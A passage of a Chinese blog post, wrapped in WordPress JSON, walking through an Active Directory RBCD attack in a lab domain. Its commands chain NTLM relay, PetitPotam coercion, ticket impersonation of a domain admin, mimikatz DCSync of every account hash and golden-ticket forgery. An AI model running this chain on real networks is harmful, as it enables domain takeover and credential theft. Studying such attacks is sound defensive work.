\/><\/p>\n<blockquote>\n<p>\u5728\u90e8\u5206\u57df\u73af\u5883\u4e2d\uff0c\u7ba1\u7406\u5458\u53ef\u80fd\u5173\u95ed\u4e86\u666e\u901a\u57df\u7528\u6237\u6dfb\u52a0\u8ba1\u7b97\u673a\u8d26\u53f7\u7684\u6743\u9650\uff0c\u5982\u679c\u8fd9\u6837\u53ef\u4ee5\u5c1d\u8bd5\u5f3a\u5236\u8ba4\u8bc1\u57df\u63a7+\u4e2d\u7ee7\u5230ldaps\u670d\u52a1\uff08\u4e0d\u80fd\u662fldap\u670d\u52a1\uff09\u7684\u65b9\u5f0f\u6dfb\u52a0\u4e00\u4e2a\u8ba1\u7b97\u673a\u8d26\u53f7<\/p>\n<\/blockquote>\n<h4><span class=\"ez-toc-section\" id=\"%EF%BC%882%EF%BC%89%E4%B8%AD%E7%BB%A7%E5%88%B0ldap%E6%9C%8D%E5%8A%A1%E6%B7%BB%E5%8A%A0%E6%8C%87%E5%AE%9A%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%B4%A6%E5%8F%B7%E5%88%B0%E5%9F%9F%E6%8E%A7%E7%9A%84%E5%A7%94%E6%B4%BE%E6%9D%83%E9%99%90\"><\/span>\uff082\uff09\u4e2d\u7ee7\u5230ldap\u670d\u52a1\u6dfb\u52a0\u6307\u5b9a\u8ba1\u7b97\u673a\u8d26\u53f7\u5230\u57df\u63a7\u7684\u59d4\u6d3e\u6743\u9650<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<ul>\n<li>\u5f00\u542fNTLM\u4e2d\u7ee7\u76d1\u542c<\/li>\n<\/ul>\n<p>\u76ee\u7684\u662f\u5c06\u8ba4\u8bc1\u4e2d\u7ee7\u5230\u4e3b\u57df\u63a7ldap\u670d\u52a1\uff0c\u5e76\u5728\u4e3b\u57df\u63a7SPN\u670d\u52a1\u4e0a\u6dfb\u52a0\u6765\u81ea\u4e8e\u6307\u5b9a\u8ba1\u7b97\u673a\u8d26\u53f7\u7684\u59d4\u6d3e\u6743\u9650\uff1a<\/p>\n<pre><code>\/\/ --remove-mic\uff1a\u6e05\u9664NTLM\u534f\u8bae\u4e2d\u7684\u6d88\u606f\u5b8c\u6574\u6027\u68c0\u67e5\uff08MIC\uff09\u5b57\u6bb5\uff0c\u907f\u514d\u4e2d\u7ee7\u5931\u8d25\n\/\/ --delegate-access\uff1a\u6dfb\u52a0\u59d4\u6d3e\u8bbf\u95ee\u5c5e\u6027\n\/\/ --escalate-user\uff1a\u6307\u5b9a\u63d0\u5347\u6743\u9650\u7684\u8ba1\u7b97\u673a\u8d26\u6237\n\nntlmrelayx.py -t ldap:\/\/10.10.10.10 --remove-mic --delegate-access --escalate-user newserv$<\/code><\/pre>\n<blockquote>\n<p>\u5728windows\u4e0a\u8fd0\u884cntlmrelayx\u9700\u8981\u5173\u95edServer\u670d\u52a1\uff0c\u5426\u5219\u4f1a\u56e0\u4e3a139\/445\u7aef\u53e3\u5360\u7528\uff0c\u5bfc\u81f4\u7a0b\u5e8f\u542f\u52a8\u5931\u8d25<\/p>\n<\/blockquote>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d06934cd.\" alt=\"\" \/><\/p>\n<ul>\n<li>\u5f3a\u5236\u8ba4\u8bc1\u57df\u63a7<\/li>\n<\/ul>\n<blockquote>\n<p>\u901a\u8fc7\u57df\u63a7\u516c\u5f00\u7684\u5f3a\u5236\u8ba4\u8bc1\u6f0f\u6d1e\uff0c\u53ef\u4f7f\u57df\u63a7\u7684\u673a\u5668\u8d26\u53f7\u901a\u8fc7NTLM\u8ba4\u8bc1\u6307\u5b9a\u5730\u5740\uff0c\u5e38\u89c1\u7684\u5f3a\u5236\u8ba4\u8bc1\u6f0f\u6d1e\u6709\u4ee5\u4e0b\uff1a<\/p>\n<ul>\n<li>DFSCoerce\uff1a<a href=\"https:\/\/github.com\/Wh04m1001\/DFSCoerce\">https:\/\/github.com\/Wh04m1001\/DFSCoerce<\/a><\/li>\n<li>PetitPotam\uff1a<a href=\"https:\/\/github.com\/topotam\/PetitPotam\">https:\/\/github.com\/topotam\/PetitPotam<\/a><\/li>\n<li>ShadowCoerce\uff1a<a href=\"https:\/\/github.com\/ShutdownRepo\/ShadowCoerce\">https:\/\/github.com\/ShutdownRepo\/ShadowCoerce<\/a><\/li>\n<li>SpoolSample\uff1a<a href=\"https:\/\/github.com\/leechristensen\/SpoolSample\">https:\/\/github.com\/leechristensen\/SpoolSample<\/a><\/li>\n<\/ul>\n<\/blockquote>\n<p>\u8fd9\u91cc\u4f7f\u7528PetitPotam\u8ba9\u57df\u63a7\u5f3a\u5236\u8ba4\u8bc1\u5230\u8fd0\u884c\u4e86ntlmrelayx\u7684\u653b\u51fb\u8005\u4e3b\u673a\u4e0a\uff1a<\/p>\n<pre><code>PetitPotam.py 10.100.0.6 10.10.10.11<\/code><\/pre>\n<blockquote>\n<p>\u5f3a\u5236\u8ba4\u8bc1\u7684\u57df\u63a7\u4e0d\u80fd\u662f\u4e2d\u7ee7\u7684\u76ee\u6807\u57df\u63a7\uff0c\u56e0\u4e3aWindows\u4f1a\u6821\u9a8clsass.exe\u5185\u5b58\u4e2d\u7684NTLM Challenge\u5b57\u6bb5\uff0c\u5982\u679c\u53d1\u9001\u548c\u63a5\u6536\u7684\u4e00\u81f4\u4f1a\u5bfc\u81f4\u8ba4\u8bc1\u5931\u8d25\uff0c\u8fd9\u91cc\u662f\u5f3a\u5236\u8ba4\u8bc1\u5907\u57df\u5e76\u4e2d\u7ee7\u5230\u4e3b\u57df\u4e0a<\/p>\n<\/blockquote>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d069a795.\" alt=\"\" \/><\/p>\n<ul>\n<li>\u9a8c\u8bc1\u4e2d\u7ee7\u653b\u51fb\u7ed3\u679c<\/li>\n<\/ul>\n<p>\u5f53ntlmrelayx\u63a5\u6536\u5230\u6765\u81ea\u4e8e\u5907\u57df\u5f3a\u5236\u8ba4\u8bc1\u8fc7\u6765\u7684NetNTLMHash\u540e\uff0c\u4f1a\u53bb\u5904\u6389MIC\u5b57\u6bb5\uff0c\u5e76\u4e2d\u7ee7\u5230\u4e3b\u57df\u4e0a\u901a\u8fc7\u8ba4\u8bc1\uff0c\u968f\u540e\u4fee\u6539\u57df\u63a7\u8ba1\u7b97\u673a\u8d26\u53f7\u7684<code>msDS-AllowedToActOnBehalfOfOtherIdentity<\/code>\u5b57\u6bb5\uff0c\u5141\u8bb8\u6765\u81ea\u4e8e\u653b\u51fb\u8005\u65b0\u521b\u5efa\u7684\u8ba1\u7b97\u673a\u8d26\u53f7<code>newserv<\/code>\u7684\u59d4\u6d3e\u8bf7\u6c42\u3002<\/p>\n<blockquote>\n<p>\u5982\u679c\u76ee\u6807\u57df\u5185\u7528\u6237\u8f83\u591a\uff0c\u8fd9\u91cc\u6267\u884c\u7684\u65f6\u95f4\u4f1a\u6bd4\u8f83\u957f<\/p>\n<\/blockquote>\n<p>\u8fd9\u91cc\u53ef\u4ee5\u770b\u5230\uff0c\u5df2\u7ecf\u6210\u529f\u6dfb\u52a0\u4e86<code>newserv<\/code>\u5230\u57df\u63a7\u8ba1\u7b97\u673a<code>DC-BACKUP-1<\/code>\u7684\u59d4\u6d3e\u6743\u9650\uff1a<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d06a2d16.\" alt=\"\" \/><\/p>\n<h4><span class=\"ez-toc-section\" id=\"%EF%BC%883%EF%BC%89%E7%94%B3%E8%AF%B7%E5%A7%94%E6%B4%BE%E7%89%B9%E6%9D%83%E8%B4%A6%E5%8F%B7%E5%88%B0%E5%9F%9F%E6%8E%A7%E6%9C%8D%E5%8A%A1%E7%9A%84ST%E7%A5%A8%E6%8D%AE\"><\/span>\uff083\uff09\u7533\u8bf7\u59d4\u6d3e\u7279\u6743\u8d26\u53f7\u5230\u57df\u63a7\u670d\u52a1\u7684ST\u7968\u636e<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<p>\u968f\u540e\u53ef\u4ee5\u7528\u8ba1\u7b97\u673a\u8d26\u53f7<code>newserv<\/code>\u59d4\u6d3e\u6210\u57df\u7ba1\u8d26\u53f7<code>domain_admin<\/code>\u8bbf\u95ee\u57df\u63a7<code>dc-backup-1.qiuqiu.com<\/code>\u7684SPN\u670d\u52a1\uff0c\u5e76\u5411KDC\u7533\u8bf7\u8bbf\u95ee\u76ee\u7684\u670d\u52a1\u7684ST\u7968\u636e\uff1a<\/p>\n<pre><code>getST.py -dc-ip 10.10.10.11 qiuqiu.com\/newserv$:Test1234 -spn cifs\/dc-backup-1.qiuqiu.com -impersonate domain_admin<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d06ae32a.\" alt=\"\" \/><\/p>\n<h4><span class=\"ez-toc-section\" id=\"%EF%BC%884%EF%BC%89%E4%BD%BF%E7%94%A8ST%E7%A5%A8%E6%8D%AE%E6%8E%A5%E7%AE%A1%E5%9F%9F%E6%8E%A7\"><\/span>\uff084\uff09\u4f7f\u7528ST\u7968\u636e\u63a5\u7ba1\u57df\u63a7<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<pre><code>\/\/ \u8bbe\u7f6eST\u7968\u636e\u73af\u5883\u53d8\u91cf\nset KRB5CCNAME=domain_admin.ccache\n\n\/\/ \u8fdc\u7a0b\u521b\u5efa\u4ea4\u4e92\u5f0fcmdshell\nsmbexec.py -k -no-pass dc-backup-1.qiuqiu.com -codec gb2312<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d06b6dbf.\" alt=\"\" \/><\/p>\n<h4><span class=\"ez-toc-section\" id=\"%EF%BC%885%EF%BC%89%E5%88%B6%E4%BD%9C%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE\"><\/span>\uff085\uff09\u5236\u4f5c\u9ec4\u91d1\u7968\u636e<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<ul>\n<li>\u901a\u8fc7smbclient.py\u4e0a\u4f20\u6587\u4ef6<\/li>\n<\/ul>\n<pre><code>\/\/ \u8bbe\u7f6eST\u7968\u636e\u5730\u5740\nset KRB5CCNAME=domain_admin.ccache\n\n\/\/ \u8fde\u63a5\u5230smb\u670d\u52a1\nsmbclient.py -k -no-pass dc-backup-1.qiuqiu.com\n\n\/\/ \u9009\u62e9\u5171\u4eab\u76ee\u5f55\u5e76\u4e0a\u4f20\u6587\u4ef6\n# use c$\n# put winrar.exe\n# put mimikatz_trunk.zip<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d06be92b.\" alt=\"\" \/><\/p>\n<ul>\n<li>\u901a\u8fc7psexec.py\u83b7\u53d6\u4ea4\u4e92\u5f0fshell<\/li>\n<\/ul>\n<pre><code>set KRB5CCNAME=domain_admin.ccache\npsexec.py -k -no-pass dc-backup-1.qiuqiu.com\n\n\/\/ \u89e3\u538bmimikatz\nwinrar.exe x mimikatz_trunk.zip<\/code><\/pre>\n<ul>\n<li>dcsync\u83b7\u53d6krbtgt\u7528\u6237HASH<\/li>\n<\/ul>\n<p>\u4f7f\u7528mimikatz\u672c\u5730dcsync\u57df\u5185\u6240\u6709\u8d26\u6237\u7684NTLM HASH\uff1a<\/p>\n<pre><code>mimikatz.exe &quot;privilege::debug&quot; &quot;lsadump::dcsync \/domain:qiuqiu.com \/all \/csv&quot; exit<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d06c6673.\" alt=\"\" \/><\/p>\n<ul>\n<li>\u67e5\u8be2\u57df\u7684SID<\/li>\n<\/ul>\n<p>\u4f7f\u7528<code>whoami \/user<\/code>\u547d\u4ee4\uff0c\u57df\u7684SID\u5c31\u662f\u4e0d\u5305\u542b\u6700\u540e\u4e00\u90e8\u5206\u7684SID\uff1a<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d06cd0f4.\" alt=\"\" \/><\/p>\n<ul>\n<li>\u4f7f\u7528ticketer.py\u5236\u4f5c\u57df\u7ba1\u7684\u91d1\u7968\uff1a<\/li>\n<\/ul>\n<pre><code>ticketer.py -nthash 7cb1846696ce7d81f05f861cf41b42a4 -domain-sid S-1-5-21-573638044-2771444813-2757395567 -domain qiuqiu.com  domain_admin<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d06d58c1.\" alt=\"\" \/><\/p>\n<ul>\n<li>\u4f7f\u7528\u91d1\u7968\u8bbf\u95ee\u57df\u5185\u4efb\u610f\u4e3b\u673a<\/li>\n<\/ul>\n<p>\u4f8b\u5982\u8bbf\u95ee\u4e3b\u57df\u63a7\uff1a<\/p>\n<pre><code>psexec.py -k -no-pass qiuqiu.com\/domain_admin@dc-main-1.qiuqiu.comwhoami -codec gb2312<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d06dcbdb.\" alt=\"\" \/><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e\u76f8\u6bd4\u4e8e\u975e\u7ea6\u675f\u59d4\u6d3e\u548c\u7ea6\u675f\u59d4\u6d3e\uff0c\u5728\u8bbe\u7f6e\u670d\u52a1\u8d26\u53f7\u548c\u8ba1\u7b97\u673a\u8d26\u53f7\u7684\u59d4\u6d3e\u6743\u9650\u7075\u6d3b\u6027\u66f4\u9ad8\uff0c\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e\u4e0d\u9700\u8981\u57df\u7ba1\u7406\u5458\u6743\u9650\u53bb\u8bbe\u7f6e\uff0c\u800c\u628a\u8bbe\u7f6e\u5c5e\u6027\u7684\u6743\u9650\u8d4b\u4e88\u7ed9\u4e86\u673a\u5668\u81ea\u8eab\u4ee5\u53ca\u52a0\u57df\u8d26\u53f7\u3002<\/p>\n","protected":false},"author":1,"featured_media":1006,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[322],"tags":[],"class_list":["post-1002","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v16.9 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e\uff08RBCD\uff09\u653b\u51fb - Wayne&#039;s Blog<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/weizn.net\/?p=1002\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e\uff08RBCD\uff09\u653b\u51fb - Wayne&#039;s Blog\" \/>\n<meta property=\"og:description\" content=\"\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e\u76f8\u6bd4\u4e8e\u975e\u7ea6\u675f\u59d4\u6d3e\u548c\u7ea6\u675f\u59d4\u6d3e\uff0c\u5728\u8bbe\u7f6e\u670d\u52a1\u8d26\u53f7\u548c\u8ba1\u7b97\u673a\u8d26\u53f7\u7684\u59d4\u6d3e\u6743\u9650\u7075\u6d3b\u6027\u66f4\u9ad8\uff0c\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e\u4e0d\u9700\u8981\u57df\u7ba1\u7406\u5458\u6743\u9650\u53bb\u8bbe\u7f6e\uff0c\u800c\u628a\u8bbe\u7f6e\u5c5e\u6027\u7684\u6743\u9650\u8d4b\u4e88\u7ed9\u4e86\u673a\u5668\u81ea\u8eab\u4ee5\u53ca\u52a0\u57df\u8d26\u53f7\u3002\" \/>\n<meta property=\"og:url\" content=\"http:\/\/weizn.net\/?p=1002\" \/>\n<meta property=\"og:site_name\" content=\"Wayne&#039;s Blog\" \/>\n<meta property=\"article:published_time\" content=\"2023-09-24T07:12:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-05-08T08:53:44+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/weizn.net\/wp-content\/uploads\/2022\/03\/rbcd_16953769751535.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"2128\" \/>\n\t<meta property=\"og:image:height\" content=\"1530\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"zinan\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"http:\/\/weizn.net\/#website\",\"url\":\"http:\/\/weizn.net\/\",\"name\":\"Wayne&#039;s Blog\",\"description\":\"\",\"publisher\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\/\/weizn.net\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"zh-Hans\"},{\"@type\":\"ImageObject\",\"@id\":\"http:\/\/weizn.net\/?p=1002#primaryimage\",\"inLanguage\":\"zh-Hans\",\"url\":\"http:\/\/weizn.net\/wp-content\/uploads\/2022\/03\/rbcd_16953769751535.jpg\",\"contentUrl\":\"http:\/\/weizn.net\/wp-content\/uploads\/2022\/03\/rbcd_16953769751535.jpg\",\"width\":2128,\"height\":1530},{\"@type\":\"WebPage\",\"@id\":\"http:\/\/weizn.net\/?p=1002#webpage\",\"url\":\"http:\/\/weizn.net\/?p=1002\",\"name\":\"\\u57fa\\u4e8e\\u8d44\\u6e90\\u7684\\u7ea6\\u675f\\u59d4\\u6d3e\\uff08RBCD\\uff09\\u653b\\u51fb - Wayne&#039;s Blog\",\"isPartOf\":{\"@id\":\"http:\/\/weizn.net\/#website\"},\"primaryImageOfPage\":{\"@id\":\"http:\/\/weizn.net\/?p=1002#primaryimage\"},\"datePublished\":\"2023-09-24T07:12:00+00:00\",\"dateModified\":\"2026-05-08T08:53:44+00:00\",\"breadcrumb\":{\"@id\":\"http:\/\/weizn.net\/?p=1002#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/weizn.net\/?p=1002\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/weizn.net\/?p=1002#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\\u9996\\u9875\",\"item\":\"http:\/\/weizn.net\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\\u57fa\\u4e8e\\u8d44\\u6e90\\u7684\\u7ea6\\u675f\\u59d4\\u6d3e\\uff08RBCD\\uff09\\u653b\\u51fb\"}]},{\"@type\":\"Article\",\"@id\":\"http:\/\/weizn.net\/?p=1002#article\",\"isPartOf\":{\"@id\":\"http:\/\/weizn.net\/?p=1002#webpage\"},\"author\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"headline\":\"\\u57fa\\u4e8e\\u8d44\\u6e90\\u7684\\u7ea6\\u675f\\u59d4\\u6d3e\\uff08RBCD\\uff09\\u653b\\u51fb\",\"datePublished\":\"2023-09-24T07:12:00+00:00\",\"dateModified\":\"2026-05-08T08:53:44+00:00\",\"mainEntityOfPage\":{\"@id\":\"http:\/\/weizn.net\/?p=1002#webpage\"},\"wordCount\":209,\"commentCount\":0,\"publisher\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"image\":{\"@id\":\"http:\/\/weizn.net\/?p=1002#primaryimage\"},\"thumbnailUrl\":\"http:\/\/weizn.net\/wp-content\/uploads\/2022\/03\/rbcd_16953769751535.jpg\",\"articleSection\":[\"\\u6280\\u672f\\u6587\\u7ae0\"],\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"http:\/\/weizn.net\/?p=1002#respond\"]}]},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\",\"name\":\"zinan\",\"logo\":{\"@id\":\"http:\/\/weizn.net\/#personlogo\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e\uff08RBCD\uff09\u653b\u51fb - Wayne&#039;s Blog","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/weizn.net\/?p=1002","og_locale":"zh_CN","og_type":"article","og_title":"\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e\uff08RBCD\uff09\u653b\u51fb - Wayne&#039;s Blog","og_description":"\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e\u76f8\u6bd4\u4e8e\u975e\u7ea6\u675f\u59d4\u6d3e\u548c\u7ea6\u675f\u59d4\u6d3e\uff0c\u5728\u8bbe\u7f6e\u670d\u52a1\u8d26\u53f7\u548c\u8ba1\u7b97\u673a\u8d26\u53f7\u7684\u59d4\u6d3e\u6743\u9650\u7075\u6d3b\u6027\u66f4\u9ad8\uff0c\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e\u4e0d\u9700\u8981\u57df\u7ba1\u7406\u5458\u6743\u9650\u53bb\u8bbe\u7f6e\uff0c\u800c\u628a\u8bbe\u7f6e\u5c5e\u6027\u7684\u6743\u9650\u8d4b\u4e88\u7ed9\u4e86\u673a\u5668\u81ea\u8eab\u4ee5\u53ca\u52a0\u57df\u8d26\u53f7\u3002","og_url":"http:\/\/weizn.net\/?p=1002","og_site_name":"Wayne&#039;s Blog","article_published_time":"2023-09-24T07:12:00+00:00","article_modified_time":"2026-05-08T08:53:44+00:00","og_image":[{"width":2128,"height":1530,"filesize":480431,"url":"http:\/\/weizn.net\/wp-content\/uploads\/2022\/03\/rbcd_16953769751535.jpg","path":"\/app\/wp-content\/uploads\/2022\/03\/rbcd_16953769751535.jpg","size":"full","id":1006,"alt":"","pixels":3255840,"type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"zinan","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"4 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"http:\/\/weizn.net\/#website","url":"http:\/\/weizn.net\/","name":"Wayne&#039;s Blog","description":"","publisher":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/weizn.net\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"zh-Hans"},{"@type":"ImageObject","@id":"http:\/\/weizn.net\/?p=1002#primaryimage","inLanguage":"zh-Hans","url":"http:\/\/weizn.net\/wp-content\/uploads\/2022\/03\/rbcd_16953769751535.jpg","contentUrl":"http:\/\/weizn.net\/wp-content\/uploads\/2022\/03\/rbcd_16953769751535.jpg","width":2128,"height":1530},{"@type":"WebPage","@id":"http:\/\/weizn.net\/?p=1002#webpage","url":"http:\/\/weizn.net\/?p=1002","name":"\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e\uff08RBCD\uff09\u653b\u51fb - Wayne&#039;s Blog","isPartOf":{"@id":"http:\/\/weizn.net\/#website"},"primaryImageOfPage":{"@id":"http:\/\/weizn.net\/?p=1002#primaryimage"},"datePublished":"2023-09-24T07:12:00+00:00","dateModified":"2026-05-08T08:53:44+00:00","breadcrumb":{"@id":"http:\/\/weizn.net\/?p=1002#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["http:\/\/weizn.net\/?p=1002"]}]},{"@type":"BreadcrumbList","@id":"http:\/\/weizn.net\/?p=1002#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"http:\/\/weizn.net\/"},{"@type":"ListItem","position":2,"name":"\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e\uff08RBCD\uff09\u653b\u51fb"}]},{"@type":"Article","@id":"http:\/\/weizn.net\/?p=1002#article","isPartOf":{"@id":"http:\/\/weizn.net\/?p=1002#webpage"},"author":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"headline":"\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e\uff08RBCD\uff09\u653b\u51fb","datePublished":"2023-09-24T07:12:00+00:00","dateModified":"2026-05-08T08:53:44+00:00","mainEntityOfPage":{"@id":"http:\/\/weizn.net\/?p=1002#webpage"},"wordCount":209,"commentCount":0,"publisher":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"image":{"@id":"http:\/\/weizn.net\/?p=1002#primaryimage"},"thumbnailUrl":"http:\/\/weizn.net\/wp-content\/uploads\/2022\/03\/rbcd_16953769751535.jpg","articleSection":["\u6280\u672f\u6587\u7ae0"],"inLanguage":"zh-Hans","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["http:\/\/weizn.net\/?p=1002#respond"]}]},{"@type":["Person","Organization"],"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264","name":"zinan","logo":{"@id":"http:\/\/weizn.net\/#personlogo"}}]}},"_links":{"self":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts\/1002","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1002"}],"version-history":[{"count":3,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts\/1002\/revisions"}],"predecessor-version":[{"id":1005,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts\/1002\/revisions\/1005"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/media\/1006"}],"wp:attachment":[{"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1002"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1002"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1002"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}